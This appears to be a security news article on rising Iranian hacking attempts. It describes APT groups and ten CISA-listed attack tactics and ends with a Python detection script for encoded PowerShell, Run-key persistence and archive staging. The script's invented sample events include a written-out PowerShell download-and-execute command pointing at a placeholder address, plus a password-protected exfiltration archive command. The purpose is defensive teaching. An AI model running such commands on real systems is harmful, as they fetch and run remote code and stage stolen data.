Iran Hack Attempts Almost Triple – Iran Has Already Hacked the U.S. At Least 4 Times – Patterns of Publicly Known Iranian Advanced Persistent Threats
The number of Iran hack attempts against targets in the United States has almost tripled. The increase has intensified since the assassination of Iranian military leader Qasem Soleimani. Cyberattacks originating from Iran and targeting government websites at every level first doubled and then continued to rise.
An Iran hack may be initiated by state-sponsored hacking groups or by individuals looking to steal money or data. Iran's technical prowess has grown since 2009, and the country has several known state-sponsored Advanced Persistent Threat (APT) groups that carry out cyberwarfare. APT hacking groups are organized hacking teams that are often state-sponsored cyberwarfare organizations.
Iran hack attempts against the United States have succeeded before. Government targets include the U.S. Federal Depository Library Program (FDLP) website and a dam in Rye, New York. Iranian hackers target engineering companies, the financial sector, energy, utilities, and the oil and gas industries, as well as government entities.
According to Cloudflare, the American web infrastructure and website security company, cyberattacks originating from Iranian IP addresses and targeting federal, state, and local government websites have doubled. In just two days, Iran hack attempts on targets globally have risen to almost triple their former rate.
Iran has a history of attacking targets in the United States and across the globe. Although its repertoire of cyberattacks does not show the skill level of hackers from China and Russia, Iranian hackers can still cause damage, even if it is sometimes only a symbolic nuisance.
- US DHS Warns Iranian Cyberattack Could Damage Critical Infrastructure
- Cyberwarfare with Iran – DHS Issues National Terrorism Advisory System Bulletin
- Iranian Hacker Website Targets US Veterans with Malware
- Iranian Hackers Target LinkedIn Users with Malware Attack
- US Cyber Command Warns of Iranian Cyber Attack on MS Outlook
- US CISA and Iranian Hackers Exchange Cyber Attacks
- Citrix Breached by Iranian-backed Hackers
What is an Advanced Persistent Threat (APT) Group?
An Advanced Persistent Threat Group, known as an APT Group, is an organized hacking organization. APT groups often work at the behest of a national government to steal money to fund other activities, spy on other countries or political targets, or conduct corporate espionage. Cyber security researchers give APT hacking groups numbers and names to track their activities and to avoid offending the governments the APT groups work for. In one common naming scheme the animal in the name stands for the country the group is attributed to: Kitten for Iran, Panda for China. For example, Iranian APT groups include APT33, APT34, and APT35. State-sponsored APT33 is also known as Elfin, Magnallium, or Refined Kitten. Gothic Panda is a pseudonym for APT3, a Chinese APT group.
Iran Hack – How to Prepare
- Use a password manager to generate and store strong, unique passwords
- Use two-factor or multi-factor authentication for all online accounts
- Use biometric login (fingerprint or face) where it is available on phones, tablets, laptops, and desktop computers. If a phone or laptop is too old to support fingerprint login, consider upgrading to a newer device
- Make sure computers, laptops, tablets, and phones have the latest software updates installed
- Create backups of important files, photos, and critical documents such as tax records and 401K and stock account statements
- Ensure backups are kept up-to-date
- Small business owners should ensure their websites and critical systems are backed up and accessible in case of internet connection disruptions
U.S. Government Website Defaced
On 4 January 2020, during the first week of the year, the U.S. Federal Depository Library Program (FDLP) website was defaced with messaging attacking U.S. President Trump.
The Texas Department of Agriculture website and an Alabama veterans' group website were both defaced this week with an image of Iranian Commander Soleimani. The pro-Iran image was accompanied by a message stating the website was "Hacked by Iranian hacker." The city of Las Vegas, Nevada was attacked on 07 January 2020 and city services were temporarily shut down. The cyber attack struck on the first day of the massive annual Consumer Electronics Show (CES). It is too soon to tell whether any of these incidents were the work of state-sponsored hackers.
Iranians Tried to Hack 2020 Campaign
Microsoft disclosed that Iranian hackers tried to break into a 2020 Presidential campaign. The attackers targeted over 200 email accounts related to the campaign.
How Wealthy Is Iran?
Iran ranks 94th in the world by nominal GDP per capita. The United States ranks eighth. The eleven highest-ranked countries by GDP (nominal) per capita, in order, are Luxembourg, Switzerland, Macau, Norway, Iceland, Ireland, Qatar, United States, Singapore, Denmark, and Australia.
Iranian APT Hacking Organizations
The Cybersecurity and Infrastructure Security Agency (CISA) has shared information on the history and typical profile of Iran hack attacks. The following are typical Iran hack profiles describing publicly known Iranian Advanced Persistent Threat (APT) techniques.
10 Tactics Iranian Hackers Use to Attack the United States
According to CISA, these are ten tactics used by Iran hackers to compromise networks and computers in the United States and across the world.
- Credential Dumping – Credential dumping is any technique for extracting account credentials (cleartext passwords, password hashes, or authentication tokens) from an operating system or application, for example from the memory of the Windows LSASS process or from the SAM database, or from passwords stored in plain text or with weak encryption. The stolen credentials are then reused to log in to other computers on the same network.
- Obfuscated Files or Information – An attempt by the hacker to hide malware payloads by compressing, archiving (zip files), splitting up, encoding, or encrypting malicious files so that automated security tools and firewalls do not recognize them.
- Data Compressed – Stolen data is compressed to reduce the volume that must be transferred back to the hacker's servers. Smaller transfers use fewer network resources and are less likely to stand out to network monitoring tools.
- PowerShell – PowerShell is Microsoft's command-line shell and scripting language, built on the .NET Framework and designed especially for system administration. PowerShell commands let an administrator manage computers from the command line. Iranian hackers have abused PowerShell to execute malicious code on compromised computers, often hiding the script behind an encoded command.
- User Execution – User execution is when the attack depends on a human taking an action, such as clicking a link or opening a file delivered by a phishing email, to run the malware. The opened file may also exploit a browser or application vulnerability to compromise the computer or network.
- Scripting – Hackers use scripts to automate tasks that would otherwise have to be done manually, for example compressing data on a machine and sending it back to the hacker. Scripts can be embedded inside malicious Microsoft Office documents as macros.
- Registry Run Keys/Startup Folder – Windows has Run and RunOnce registry keys (under HKCU and HKLM at Software\Microsoft\Windows\CurrentVersion) and a Startup folder whose entries are launched automatically when a user logs on, with that user's permission level. Registry keys can be added, edited, and deleted to run legitimate or malicious programs at startup. Malware adds itself to these locations so that it runs every time the machine starts, making it harder to stop and remove.
- Remote File Copy – Remote file copy is the transfer of files such as tools or malware from one computer or network to another, for example from an already compromised host to additional hosts inside the victim network.
- Spear Phishing Link – A spear phishing link is a clickable link sent in the body of a targeted spear phishing email. The hacker relies on user execution: clicking the link begins a malware download, executes a malicious script, or sends the target to a spoofed website that harvests further sensitive data.
- Spear Phishing Attachment – A spear phishing attachment is a malicious file, often a Microsoft Word document, Excel spreadsheet, or Adobe PDF, that executes a malicious script if the recipient of a spear phishing email is tricked into opening it. The attachment may launch a script directly or begin further malware downloads.
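Several of the tactics above (encoded PowerShell launched from an Office document, a Run key pointing at a file in a user-writable folder, and password-protected archiving of data before exfiltration) leave recognizable traces in endpoint telemetry. The script below is an added example written for this page, not CISA's guidance or any vendor's detection content. It runs three simple rules over constructed, Sysmon-style events (the paths, SID and address are invented) and shows how the base64 behind a PowerShell -EncodedCommand is decoded so an analyst can read what the attacker actually ran.

```python
"""Detection sketches for three CISA-listed tactics: encoded PowerShell,
Run-key persistence and password-protected archive staging. Runs over
constructed Sysmon-style events (not real logs) embedded below."""
import base64
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass
class Finding:
    rule: str
    detail: str


def encode_ps(script: str) -> str:
    """Build the UTF-16LE base64 form that PowerShell's -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(blob: str) -> str:
    """Reverse encode_ps(); raises on malformed input."""
    return base64.b64decode(blob).decode("utf-16-le")


# Hypothetical sample events, loosely modelled on Sysmon Event ID 1 (process
# create) and Event ID 13 (registry value set). Every path and host is invented.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "powershell.exe -NoP -W Hidden -enc "
                + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')")},
    {"id": 13, "image": r"C:\Users\jsmith\AppData\Roaming\update.exe",
     "target": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"C:\Users\jsmith\AppData\Roaming\update.exe"},
    {"id": 1, "image": r"C:\Program Files\7-Zip\7z.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'7z.exe a -p"Secret1!" -mhe=on C:\Users\Public\stage.7z C:\Finance\*.xlsx'},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe Get-Process"},          # benign, should not fire
    {"id": 13, "image": r"C:\Program Files\Vendor\app.exe",
     "target": r"HKLM\SOFTWARE\Vendor\App\LastRun", "details": "2020-01-07"},  # benign
]

# -e, -ec, -en, -enc and -encodedcommand are all accepted abbreviations.
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\(?:Run|RunOnce)\\", re.I)
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|ProgramData|Users\\Public)\\", re.I)
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
ARCHIVERS = {"7z.exe", "rar.exe", "winrar.exe"}
ARCHIVE_PWD = re.compile(r"\s-(?:p|hp)\S*", re.I)   # 7z/rar password switches


def analyze(events):
    """Return a Finding for every event that matches one of the three rules."""
    findings = []
    for ev in events:
        image = PureWindowsPath(ev["image"]).name.lower()
        if ev["id"] == 1:
            parent = PureWindowsPath(ev.get("parent", "")).name.lower()
            m = ENC_FLAG.search(ev["cmdline"])
            if m and image in ("powershell.exe", "pwsh.exe"):
                try:
                    script = decode_ps(m.group(1))
                except (ValueError, UnicodeDecodeError):
                    script = "<undecodable>"
                via = (f" spawned by {parent} (user execution via Office)"
                       if parent in OFFICE_APPS else "")
                findings.append(Finding("powershell_encoded", f"decoded: {script}{via}"))
            if image in ARCHIVERS and ARCHIVE_PWD.search(ev["cmdline"]):
                findings.append(Finding("archive_staging",
                                        f"password-protected archive: {ev['cmdline']}"))
        elif ev["id"] == 13 and RUN_KEY.search(ev.get("target", "")):
            # A Run value pointing into a user-writable folder is the classic malware pattern.
            sev = "high" if USER_WRITABLE.search(ev.get("details", "")) else "review"
            findings.append(Finding("run_key_persistence",
                                    f"{sev}: {ev['target']} -> {ev['details']}"))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.detail}")
```

The rules are deliberately narrow. In production the Run-key check would also cover the Startup folder and the `RunOnce` variants under `Wow6432Node`, and the archiver rule would need an allowlist for backup jobs that legitimately use passwords, but the shape is the same: pick the telemetry field that the tactic cannot avoid touching and match on that.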